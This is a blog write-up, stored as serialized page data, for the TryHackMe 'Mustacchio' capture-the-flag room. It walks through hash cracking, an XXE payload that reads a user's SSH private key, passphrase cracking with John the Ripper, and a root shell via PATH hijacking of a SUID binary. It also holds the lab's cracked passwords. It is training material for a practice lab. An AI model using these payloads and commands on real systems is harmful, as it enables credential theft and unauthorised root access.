[{"data":1,"prerenderedAt":1084},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-mustacchio-writeup":3,"surround-\u002F2025\u002Ftryhackme-mustacchio-writeup":1075},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":14,"draft":6,"readingTime":15,"body":20,"_type":1068,"_id":1069,"_source":1070,"_file":1071,"_stem":1072,"_extension":1073,"_original_dir":1074},"\u002F2025\u002Ftryhackme-mustacchio-writeup","2025",false,"","TryHackMe - Mustacchio","A step-by-step walkthrough for the TryHackMe 'Mustacchio' room. This guide covers initial access via XXE injection and privilege escalation to root by exploiting a SUID binary with a PATH hijacking vulnerability.","2025-08-29T13:33:15.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002Fthumbnail.jpg",[13],"CTF",true,{"text":16,"minutes":17,"time":18,"words":19},"4 min read",3.645,218700,729,{"type":21,"children":22,"toc":1063},"root",[23,29,45,52,56,78,82,86,91,95,111,115,129,133,154,158,171,175,179,184,188,194,230,259,285,573,634,655,677,681,693,697,710,715,773,779,800,805,809,838,842,846,850,886,890,939,1012,1053,1057],{"type":24,"tag":25,"props":26,"children":28},"element","pic",{"src":27},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F1.jpg",[],{"type":24,"tag":30,"props":31,"children":32},"p",{},[33,36],{"type":34,"value":35},"text","Target IP: 
",{"type":24,"tag":37,"props":38,"children":42},"a",{"href":39,"rel":40},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fmustacchio",[41],"nofollow",[43],{"type":34,"value":44},"10.10.109.12",{"type":24,"tag":46,"props":47,"children":49},"h2",{"id":48},"reconnaissance",[50],{"type":34,"value":51},"Reconnaissance",{"type":24,"tag":25,"props":53,"children":55},{"src":54},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F2.jpg",[],{"type":24,"tag":30,"props":57,"children":58},{},[59,61,68,70,76],{"type":34,"value":60},"We found one ",{"type":24,"tag":62,"props":63,"children":65},"code",{"className":64},[],[66],{"type":34,"value":67},"ssh",{"type":34,"value":69}," server and two ",{"type":24,"tag":62,"props":71,"children":73},{"className":72},[],[74],{"type":34,"value":75},"web",{"type":34,"value":77}," servers. Let's check them out.",{"type":24,"tag":25,"props":79,"children":81},{"src":80},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F3.jpg",[],{"type":24,"tag":25,"props":83,"children":85},{"src":84},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F4.jpg",[],{"type":24,"tag":30,"props":87,"children":88},{},[89],{"type":34,"value":90},"As we can see, one server hosts a normal page, and the other has an admin login panel.\nNow, let's perform a directory scan on the main site to see what we can find.",{"type":24,"tag":25,"props":92,"children":94},{"src":93},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F5.jpg",[],{"type":24,"tag":30,"props":96,"children":97},{},[98,100,109],{"type":34,"value":99},"And we found a non-standard directory named ",{"type":24,"tag":62,"props":101,"children":106},{"className":102,"id":104,"style":105},[103],"example-info","just-like-this","color: 
#efb11d",[107],{"type":34,"value":108},"\u002Fcustom",{"type":34,"value":110}," . Let's investigate it.",{"type":24,"tag":25,"props":112,"children":114},{"src":113},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F6.jpg",[],{"type":24,"tag":30,"props":116,"children":117},{},[118,120,127],{"type":34,"value":119},"Here, the ",{"type":24,"tag":62,"props":121,"children":124},{"className":122,"id":104,"style":123},[103],"color: #4DFFBE",[125],{"type":34,"value":126},"users.bak",{"type":34,"value":128}," file catches our attention. Let's download it to our machine and check it; it might contain something valuable.",{"type":24,"tag":25,"props":130,"children":132},{"src":131},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F7.jpg",[],{"type":24,"tag":30,"props":134,"children":135},{},[136,138,144,146,152],{"type":34,"value":137},"Upon inspection, we see that it's an SQLite database. When we examine it, we find the username ",{"type":24,"tag":62,"props":139,"children":141},{"className":140},[],[142],{"type":34,"value":143},"admin",{"type":34,"value":145}," and a hash. Let's try to crack this hash using ",{"type":24,"tag":37,"props":147,"children":150},{"href":148,"rel":149},"https:\u002F\u002Fcrackstation.net\u002F",[41],[151],{"type":34,"value":148},{"type":34,"value":153},".",{"type":24,"tag":25,"props":155,"children":157},{"src":156},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F8.jpg",[],{"type":24,"tag":30,"props":159,"children":160},{},[161,163,169],{"type":34,"value":162},"Our hash is cracked, and we've obtained the credentials ",{"type":24,"tag":62,"props":164,"children":166},{"className":165,"id":104,"style":123},[103],[167],{"type":34,"value":168},"admin:bulldog19",{"type":34,"value":170},". 
Now, let's try to log into the admin page we found with these credentials.",{"type":24,"tag":25,"props":172,"children":174},{"src":173},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F9.jpg",[],{"type":24,"tag":25,"props":176,"children":178},{"src":177},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F10.jpg",[],{"type":24,"tag":30,"props":180,"children":181},{},[182],{"type":34,"value":183},"And we were able to log in. Now, we are presented with a comment submission form and nothing else. Perhaps there's something in the source code; let's examine the page's source.",{"type":24,"tag":25,"props":185,"children":187},{"src":186},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F11.jpg",[],{"type":24,"tag":46,"props":189,"children":191},{"id":190},"initial-access",[192],{"type":34,"value":193},"Initial Access",{"type":24,"tag":30,"props":195,"children":196},{},[197,199,205,207,212,214,220,222,228],{"type":34,"value":198},"From the source code, we discover the username ",{"type":24,"tag":62,"props":200,"children":202},{"className":201,"id":104,"style":123},[103],[203],{"type":34,"value":204},"barry",{"type":34,"value":206}," and learn that this user has an ",{"type":24,"tag":62,"props":208,"children":210},{"className":209,"id":104,"style":123},[103],[211],{"type":34,"value":67},{"type":34,"value":213}," key. We also see that the comment section expects data in ",{"type":24,"tag":62,"props":215,"children":217},{"className":216,"id":104,"style":123},[103],[218],{"type":34,"value":219},"XML",{"type":34,"value":221}," format. 
This immediately suggests an ",{"type":24,"tag":62,"props":223,"children":225},{"className":224},[],[226],{"type":34,"value":227},"XXE (XML External Entity) Injection",{"type":34,"value":229}," attack.",{"type":24,"tag":231,"props":232,"children":234},"alert",{"type":233},"caution",[235,244],{"type":24,"tag":236,"props":237,"children":238},"template",{"v-slot:title":7},[239],{"type":24,"tag":30,"props":240,"children":241},{},[242],{"type":34,"value":243},"How Does XXE Work?",{"type":24,"tag":30,"props":245,"children":246},{},[247,249,257],{"type":34,"value":248},"The XML standard allows for the definition of variables called ",{"type":24,"tag":250,"props":251,"children":254},"span",{"className":252,"id":104,"style":253},[103],"color: #EA5B6F",[255],{"type":34,"value":256},"entities.",{"type":34,"value":258}," These entities can load data from external sources (e.g., a file on the system or a URL). If the XML parser on the server is insecurely configured to process these external entities, we can exploit it. Disabling DTD and external-entity processing in the parser is what prevents this.",{"type":24,"tag":30,"props":260,"children":261},{},[262,264,269,271,276,278,284],{"type":34,"value":263},"We know that the user ",{"type":24,"tag":62,"props":265,"children":267},{"className":266},[],[268],{"type":34,"value":204},{"type":34,"value":270}," has an SSH key. Therefore, if we can load a file using the XXE vulnerability, we'll load this ",{"type":24,"tag":62,"props":272,"children":274},{"className":273},[],[275],{"type":34,"value":67},{"type":34,"value":277}," file. We can do this with the following XML structure. 
By default, an SSH private key is located at ",{"type":24,"tag":62,"props":279,"children":281},{"className":280,"id":104,"style":105},[103],[282],{"type":34,"value":283},"\u002Fhome\u002Fusername\u002F.ssh\u002Fid_rsa",{"type":34,"value":153},{"type":24,"tag":286,"props":287,"children":291},"pre",{"className":288,"code":289,"language":290,"meta":7,"style":7},"language-xml shiki shiki-themes catppuccin-latte one-dark-pro","\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE comment [\n  \u003C!ENTITY xxe SYSTEM \"file:\u002F\u002F\u002Fhome\u002Fbarry\u002F.ssh\u002Fid_rsa\">\n]>\n\u003Ccomment>\n  \u003Cname>test\u003C\u002Fname>\n  \u003Cauthor>test\u003C\u002Fauthor>\n  \u003Ccom>&xxe;\u003C\u002Fcom>\n\u003C\u002Fcomment>\n","xml",[292],{"type":24,"tag":62,"props":293,"children":294},{"__ignoreMap":7},[295,348,376,410,423,441,478,511,557],{"type":24,"tag":250,"props":296,"children":299},{"class":297,"line":298},"line",1,[300,306,311,317,323,329,334,338,343],{"type":24,"tag":250,"props":301,"children":303},{"style":302},"--shiki-default:#179299;--shiki-dark:#ABB2BF",[304],{"type":34,"value":305},"\u003C?",{"type":24,"tag":250,"props":307,"children":309},{"style":308},"--shiki-default:#1E66F5;--shiki-dark:#E06C75",[310],{"type":34,"value":290},{"type":24,"tag":250,"props":312,"children":314},{"style":313},"--shiki-default:#DF8E1D;--shiki-dark:#D19A66",[315],{"type":34,"value":316}," version",{"type":24,"tag":250,"props":318,"children":320},{"style":319},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[321],{"type":34,"value":322},"=",{"type":24,"tag":250,"props":324,"children":326},{"style":325},"--shiki-default:#40A02B;--shiki-dark:#98C379",[327],{"type":34,"value":328},"\"1.0\"",{"type":24,"tag":250,"props":330,"children":331},{"style":313},[332],{"type":34,"value":333}," 
encoding",{"type":24,"tag":250,"props":335,"children":336},{"style":319},[337],{"type":34,"value":322},{"type":24,"tag":250,"props":339,"children":340},{"style":325},[341],{"type":34,"value":342},"\"UTF-8\"",{"type":24,"tag":250,"props":344,"children":345},{"style":302},[346],{"type":34,"value":347},"?>\n",{"type":24,"tag":250,"props":349,"children":351},{"class":297,"line":350},2,[352,358,364,370],{"type":24,"tag":250,"props":353,"children":355},{"style":354},"--shiki-default:#8839EF;--shiki-dark:#ABB2BF",[356],{"type":34,"value":357},"\u003C!",{"type":24,"tag":250,"props":359,"children":361},{"style":360},"--shiki-default:#8839EF;--shiki-dark:#C678DD",[362],{"type":34,"value":363},"DOCTYPE",{"type":24,"tag":250,"props":365,"children":367},{"style":366},"--shiki-default:#4C4F69;--shiki-dark:#E5C07B",[368],{"type":34,"value":369}," comment",{"type":24,"tag":250,"props":371,"children":373},{"style":372},"--shiki-default:#7C7F93;--shiki-dark:#D19A66",[374],{"type":34,"value":375}," [\n",{"type":24,"tag":250,"props":377,"children":379},{"class":297,"line":378},3,[380,385,390,395,400,405],{"type":24,"tag":250,"props":381,"children":382},{"style":354},[383],{"type":34,"value":384},"  \u003C!",{"type":24,"tag":250,"props":386,"children":387},{"style":360},[388],{"type":34,"value":389},"ENTITY",{"type":24,"tag":250,"props":391,"children":392},{"style":366},[393],{"type":34,"value":394}," xxe",{"type":24,"tag":250,"props":396,"children":397},{"style":360},[398],{"type":34,"value":399}," SYSTEM 
",{"type":24,"tag":250,"props":401,"children":402},{"style":325},[403],{"type":34,"value":404},"\"file:\u002F\u002F\u002Fhome\u002Fbarry\u002F.ssh\u002Fid_rsa\"",{"type":24,"tag":250,"props":406,"children":407},{"style":354},[408],{"type":34,"value":409},">\n",{"type":24,"tag":250,"props":411,"children":413},{"class":297,"line":412},4,[414,419],{"type":24,"tag":250,"props":415,"children":416},{"style":372},[417],{"type":34,"value":418},"]",{"type":24,"tag":250,"props":420,"children":421},{"style":354},[422],{"type":34,"value":409},{"type":24,"tag":250,"props":424,"children":426},{"class":297,"line":425},5,[427,432,437],{"type":24,"tag":250,"props":428,"children":429},{"style":302},[430],{"type":34,"value":431},"\u003C",{"type":24,"tag":250,"props":433,"children":434},{"style":308},[435],{"type":34,"value":436},"comment",{"type":24,"tag":250,"props":438,"children":439},{"style":302},[440],{"type":34,"value":409},{"type":24,"tag":250,"props":442,"children":444},{"class":297,"line":443},6,[445,450,455,460,465,470,474],{"type":24,"tag":250,"props":446,"children":447},{"style":302},[448],{"type":34,"value":449},"  
\u003C",{"type":24,"tag":250,"props":451,"children":452},{"style":308},[453],{"type":34,"value":454},"name",{"type":24,"tag":250,"props":456,"children":457},{"style":302},[458],{"type":34,"value":459},">",{"type":24,"tag":250,"props":461,"children":462},{"style":319},[463],{"type":34,"value":464},"test",{"type":24,"tag":250,"props":466,"children":467},{"style":302},[468],{"type":34,"value":469},"\u003C\u002F",{"type":24,"tag":250,"props":471,"children":472},{"style":308},[473],{"type":34,"value":454},{"type":24,"tag":250,"props":475,"children":476},{"style":302},[477],{"type":34,"value":409},{"type":24,"tag":250,"props":479,"children":481},{"class":297,"line":480},7,[482,486,491,495,499,503,507],{"type":24,"tag":250,"props":483,"children":484},{"style":302},[485],{"type":34,"value":449},{"type":24,"tag":250,"props":487,"children":488},{"style":308},[489],{"type":34,"value":490},"author",{"type":24,"tag":250,"props":492,"children":493},{"style":302},[494],{"type":34,"value":459},{"type":24,"tag":250,"props":496,"children":497},{"style":319},[498],{"type":34,"value":464},{"type":24,"tag":250,"props":500,"children":501},{"style":302},[502],{"type":34,"value":469},{"type":24,"tag":250,"props":504,"children":505},{"style":308},[506],{"type":34,"value":490},{"type":24,"tag":250,"props":508,"children":509},{"style":302},[510],{"type":34,"value":409},{"type":24,"tag":250,"props":512,"children":514},{"class":297,"line":513},8,[515,519,524,528,534,540,545,549,553],{"type":24,"tag":250,"props":516,"children":517},{"style":302},[518],{"type":34,"value":449},{"type":24,"tag":250,"props":520,"children":521},{"style":308},[522],{"type":34,"value":523},"com",{"type":24,"tag":250,"props":525,"children":526},{"style":302},[527],{"type":34,"value":459},{"type":24,"tag":250,"props":529,"children":531},{"style":530},"--shiki-default:#D20F39;--shiki-dark:#D19A66",[532],{"type":34,"value":533},"&",{"type":24,"tag":250,"props":535,"children":537},{"style":536},"--shiki-default:#D20F39;--sh
iki-dark:#E06C75",[538],{"type":34,"value":539},"xxe",{"type":24,"tag":250,"props":541,"children":542},{"style":530},[543],{"type":34,"value":544},";",{"type":24,"tag":250,"props":546,"children":547},{"style":302},[548],{"type":34,"value":469},{"type":24,"tag":250,"props":550,"children":551},{"style":308},[552],{"type":34,"value":523},{"type":24,"tag":250,"props":554,"children":555},{"style":302},[556],{"type":34,"value":409},{"type":24,"tag":250,"props":558,"children":560},{"class":297,"line":559},9,[561,565,569],{"type":24,"tag":250,"props":562,"children":563},{"style":302},[564],{"type":34,"value":469},{"type":24,"tag":250,"props":566,"children":567},{"style":308},[568],{"type":34,"value":436},{"type":24,"tag":250,"props":570,"children":571},{"style":302},[572],{"type":34,"value":409},{"type":24,"tag":574,"props":575,"children":576},"ul",{},[577,596,614],{"type":24,"tag":578,"props":579,"children":580},"li",{},[581,588,590,595],{"type":24,"tag":62,"props":582,"children":585},{"className":583,"id":104,"style":584},[103],"color: #77BEF0",[586],{"type":34,"value":587},"\u003C!ENTITY xxe ...>",{"type":34,"value":589},": This declaration creates a special variable (entity) named ",{"type":24,"tag":62,"props":591,"children":593},{"className":592},[],[594],{"type":34,"value":539},{"type":34,"value":153},{"type":24,"tag":578,"props":597,"children":598},{},[599,605,607,612],{"type":24,"tag":62,"props":600,"children":602},{"className":601,"id":104,"style":584},[103],[603],{"type":34,"value":604},"SYSTEM \"file:\u002F\u002F\u002Fhome\u002Fbarry\u002F.ssh\u002Fid_rsa\"",{"type":34,"value":606},": This part tells the parser to read that file and use its contents as the value of the ",{"type":24,"tag":62,"props":608,"children":610},{"className":609},[],[611],{"type":34,"value":539},{"type":34,"value":613}," variable.",{"type":24,"tag":578,"props":615,"children":616},{},[617,619,624,626,632],{"type":34,"value":618},"The XML parser now knows that when it sees a reference to the entity 
",{"type":24,"tag":62,"props":620,"children":622},{"className":621},[],[623],{"type":34,"value":539},{"type":34,"value":625},", it refers to the content of the ",{"type":24,"tag":62,"props":627,"children":629},{"className":628,"id":104,"style":584},[103],[630],{"type":34,"value":631},"\u002Fhome\u002Fbarry\u002F.ssh\u002Fid_rsa",{"type":34,"value":633}," file.",{"type":24,"tag":30,"props":635,"children":636},{},[637,639,645,647,653],{"type":34,"value":638},"We then place ",{"type":24,"tag":62,"props":640,"children":642},{"className":641,"id":104,"style":123},[103],[643],{"type":34,"value":644},"&xxe;",{"type":34,"value":646}," inside the ",{"type":24,"tag":62,"props":648,"children":650},{"className":649},[],[651],{"type":34,"value":652},"\u003Ccom>",{"type":34,"value":654}," tag, making it appear as a normal part of the XML data. This will display the content of the file.",{"type":24,"tag":574,"props":656,"children":657},{},[658],{"type":24,"tag":578,"props":659,"children":660},{},[661,663,668,670,675],{"type":34,"value":662},"The ",{"type":24,"tag":62,"props":664,"children":666},{"className":665},[],[667],{"type":34,"value":533},{"type":34,"value":669}," and ",{"type":24,"tag":62,"props":671,"children":673},{"className":672},[],[674],{"type":34,"value":544},{"type":34,"value":676}," characters signal to the XML parser: \"I'm using a previously defined variable here.\"",{"type":24,"tag":25,"props":678,"children":680},{"src":679},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F12.jpg",[],{"type":24,"tag":30,"props":682,"children":683},{},[684,686,691],{"type":34,"value":685},"As you can see, we've obtained ",{"type":24,"tag":62,"props":687,"children":689},{"className":688},[],[690],{"type":34,"value":204},{"type":34,"value":692},"'s private key. 
To copy it correctly, let's open the browser's console and copy it from there.",{"type":24,"tag":25,"props":694,"children":696},{"src":695},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F13.jpg",[],{"type":24,"tag":30,"props":698,"children":699},{},[700,702,708],{"type":34,"value":701},"Let's save this key as ",{"type":24,"tag":62,"props":703,"children":705},{"className":704},[],[706],{"type":34,"value":707},"id_rsa",{"type":34,"value":709},". (Be careful to preserve the key's formatting. In my case, a leading space initially caused an issue.)",{"type":24,"tag":30,"props":711,"children":712},{},[713],{"type":34,"value":714},"Now, let's try to log in with this key. As indicated by the key's format and the SSH prompt for a password, the key is protected by a passphrase. Let's try to crack this passphrase with John the Ripper; it might be in our wordlist.",{"type":24,"tag":716,"props":717,"children":718},{},[719,732,748],{"type":24,"tag":578,"props":720,"children":721},{},[722,724,730],{"type":34,"value":723},"Use the command ",{"type":24,"tag":62,"props":725,"children":727},{"className":726},[],[728],{"type":34,"value":729},"ssh2john id_rsa > hash",{"type":34,"value":731}," to convert the key into a John-readable format.",{"type":24,"tag":578,"props":733,"children":734},{},[735,737,743,744],{"type":34,"value":736},"Now, crack the hash with ",{"type":24,"tag":62,"props":738,"children":740},{"className":739},[],[741],{"type":34,"value":742},"john hash --wordlist=\u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt",{"type":34,"value":153},{"type":24,"tag":25,"props":745,"children":747},{"src":746},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F14.jpg",[],{"type":24,"tag":578,"props":749,"children":750},{},[751,753,759,761,767,769],{"type":34,"value":752},"We found the passphrase 
(",{"type":24,"tag":62,"props":754,"children":756},{"className":755,"id":104,"style":123},[103],[757],{"type":34,"value":758},"urieljames",{"type":34,"value":760},")! Now, let's set the correct permissions for our key with ",{"type":24,"tag":62,"props":762,"children":764},{"className":763},[],[765],{"type":34,"value":766},"chmod 600 id_rsa",{"type":34,"value":768}," and connect via SSH.",{"type":24,"tag":25,"props":770,"children":772},{"src":771},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F15.jpg",[],{"type":24,"tag":46,"props":774,"children":776},{"id":775},"privilege-escalation",[777],{"type":34,"value":778},"Privilege Escalation",{"type":24,"tag":30,"props":780,"children":781},{},[782,784,790,792,798],{"type":34,"value":783},"For privilege escalation, a manual analysis of the system reveals that the ",{"type":24,"tag":62,"props":785,"children":787},{"className":786,"id":104,"style":123},[103],[788],{"type":34,"value":789},"suid",{"type":34,"value":791}," bit is set for ",{"type":24,"tag":62,"props":793,"children":795},{"className":794,"id":104,"style":123},[103],[796],{"type":34,"value":797},"\u002Fhome\u002Fjoe\u002Flive_log",{"type":34,"value":799},". 
This means our user can run this file with the permissions of its owner (root).",{"type":24,"tag":801,"props":802,"children":804},"copy",{"code":803},"find \u002F -perm -4000 -type f -ls 2>\u002Fdev\u002Fnull",[],{"type":24,"tag":25,"props":806,"children":808},{"src":807},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F16.jpg",[],{"type":24,"tag":30,"props":810,"children":811},{},[812,814,820,822,828,830,836],{"type":34,"value":813},"Upon examining this file, we see that it fetches the site's logs in real-time from ",{"type":24,"tag":62,"props":815,"children":817},{"className":816},[],[818],{"type":34,"value":819},"access.log",{"type":34,"value":821}," using the command ",{"type":24,"tag":62,"props":823,"children":825},{"className":824,"id":104,"style":105},[103],[826],{"type":34,"value":827},"tail -f \u002Fvar\u002Flog\u002Fnginx\u002Faccess.log",{"type":34,"value":829},". (You can also use tools like ",{"type":24,"tag":62,"props":831,"children":833},{"className":832},[],[834],{"type":34,"value":835},"strings",{"type":34,"value":837}," to inspect it.)",{"type":24,"tag":25,"props":839,"children":841},{"src":840},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F17.jpg",[],{"type":24,"tag":25,"props":843,"children":845},{"src":844},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F18.jpg",[],{"type":24,"tag":25,"props":847,"children":849},{"src":848},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F19.jpg",[],{"type":24,"tag":30,"props":851,"children":852},{},[853,855,861,863,869,871,877,879,884],{"type":34,"value":854},"What catches our attention is that the program calls ",{"type":24,"tag":62,"props":856,"children":858},{"className":857},[],[859],{"type":34,"value":860},"tail",{"type":34,"value":862}," 
without specifying its full path (e.g., ",{"type":24,"tag":62,"props":864,"children":866},{"className":865},[],[867],{"type":34,"value":868},"\u002Fbin\u002Ftail",{"type":34,"value":870},"). This is the vulnerability we will exploit.\nWhen the path to an executable is not specified, the system searches the directories listed in the ",{"type":24,"tag":62,"props":872,"children":874},{"className":873,"id":104,"style":123},[103],[875],{"type":34,"value":876},"$PATH",{"type":34,"value":878}," variable, which a SUID program inherits from the user who launches it. In our case, the program runs, meaning ",{"type":24,"tag":62,"props":880,"children":882},{"className":881},[],[883],{"type":34,"value":860},{"type":34,"value":885}," is in one of those directories. We can exploit this behavior. But how?",{"type":24,"tag":25,"props":887,"children":889},{"src":888},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F22.jpg",[],{"type":24,"tag":30,"props":891,"children":892},{},[893,895,900,902,908,910,915,917,922,924,930,932,937],{"type":34,"value":894},"The system checks the directories in ",{"type":24,"tag":62,"props":896,"children":898},{"className":897,"id":104,"style":105},[103],[899],{"type":34,"value":876},{"type":34,"value":901}," ",{"type":24,"tag":250,"props":903,"children":905},{"className":904,"id":104,"style":105},[103],[906],{"type":34,"value":907},"in order",{"type":34,"value":909},". This allows us to add a directory containing a malicious ",{"type":24,"tag":62,"props":911,"children":913},{"className":912},[],[914],{"type":34,"value":860},{"type":34,"value":916}," executable file to the beginning of the ",{"type":24,"tag":62,"props":918,"children":920},{"className":919},[],[921],{"type":34,"value":876},{"type":34,"value":923}," variable. 
When ",{"type":24,"tag":62,"props":925,"children":927},{"className":926},[],[928],{"type":34,"value":929},"live_log",{"type":34,"value":931}," is run, it first finds and executes the fake ",{"type":24,"tag":62,"props":933,"children":935},{"className":934},[],[936],{"type":34,"value":860},{"type":34,"value":938}," file instead of the real one. Let's see how to do this step by step:",{"type":24,"tag":716,"props":940,"children":941},{},[942,981],{"type":24,"tag":578,"props":943,"children":944},{},[945,947,952,954,960,962,968,970,976,977],{"type":34,"value":946},"First, create a simple fake ",{"type":24,"tag":62,"props":948,"children":950},{"className":949},[],[951],{"type":34,"value":860},{"type":34,"value":953}," file in the ",{"type":24,"tag":62,"props":955,"children":957},{"className":956},[],[958],{"type":34,"value":959},"\u002Ftmp",{"type":34,"value":961}," directory with the command ",{"type":24,"tag":62,"props":963,"children":965},{"className":964,"id":104,"style":584},[103],[966],{"type":34,"value":967},"echo '\u002Fbin\u002Fbash' > \u002Ftmp\u002Ftail",{"type":34,"value":969},". 
Make it executable with ",{"type":24,"tag":62,"props":971,"children":973},{"className":972},[],[974],{"type":34,"value":975},"chmod +x \u002Ftmp\u002Ftail",{"type":34,"value":153},{"type":24,"tag":25,"props":978,"children":980},{"src":979},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F20.jpg",[],{"type":24,"tag":578,"props":982,"children":983},{},[984,986,991,993,998,1000,1006,1008],{"type":34,"value":985},"Prepend the ",{"type":24,"tag":62,"props":987,"children":989},{"className":988},[],[990],{"type":34,"value":959},{"type":34,"value":992}," directory to our ",{"type":24,"tag":62,"props":994,"children":996},{"className":995},[],[997],{"type":34,"value":876},{"type":34,"value":999}," variable: ",{"type":24,"tag":62,"props":1001,"children":1003},{"className":1002,"id":104,"style":584},[103],[1004],{"type":34,"value":1005},"export PATH=\u002Ftmp:$PATH",{"type":34,"value":1007},".",{"type":24,"tag":25,"props":1009,"children":1011},{"src":1010},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F21.jpg",[],{"type":24,"tag":30,"props":1013,"children":1014},{},[1015,1017,1022,1024,1029,1031,1036,1038,1043,1045,1051],{"type":34,"value":1016},"Now, run the ",{"type":24,"tag":62,"props":1018,"children":1020},{"className":1019},[],[1021],{"type":34,"value":929},{"type":34,"value":1023}," program. Since it has the ",{"type":24,"tag":62,"props":1025,"children":1027},{"className":1026},[],[1028],{"type":34,"value":789},{"type":34,"value":1030}," bit set and is owned by ",{"type":24,"tag":62,"props":1032,"children":1034},{"className":1033},[],[1035],{"type":34,"value":21},{"type":34,"value":1037},", it will run with root privileges. 
When it tries to execute ",{"type":24,"tag":62,"props":1039,"children":1041},{"className":1040},[],[1042],{"type":34,"value":860},{"type":34,"value":1044},", it will run our malicious script, which is configured to spawn a ",{"type":24,"tag":62,"props":1046,"children":1048},{"className":1047},[],[1049],{"type":34,"value":1050},"\u002Fbin\u002Fbash",{"type":34,"value":1052}," shell. This will grant us a new shell with root privileges.",{"type":24,"tag":25,"props":1054,"children":1056},{"src":1055},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F23.jpg",[],{"type":24,"tag":1058,"props":1059,"children":1060},"style",{},[1061],{"type":34,"value":1062},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: 
var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":412,"depth":412,"links":1064},[1065,1066,1067],{"id":48,"depth":350,"text":51},{"id":190,"depth":350,"text":193},{"id":775,"depth":350,"text":778},"markdown","content:posts:2025:tryhackme-mustacchio-writeup.md","content","posts\u002F2025\u002Ftryhackme-mustacchio-writeup.md","posts\u002F2025\u002Ftryhackme-mustacchio-writeup","md","\u002Fposts",[1076,1080],{"_path":1077,"title":1078,"date":1079},"\u002F2025\u002Ftryhackme-chillhack-writeup","TryHackMe - Chill Hack","2025-08-28T11:03:29.000Z",{"_path":1081,"title":1082,"date":1083},"\u002F2025\u002Ftryhackme-lianyu-writeup","TryHackMe - Lian Yu","2025-09-01T14:54:37.000Z",1776934250795]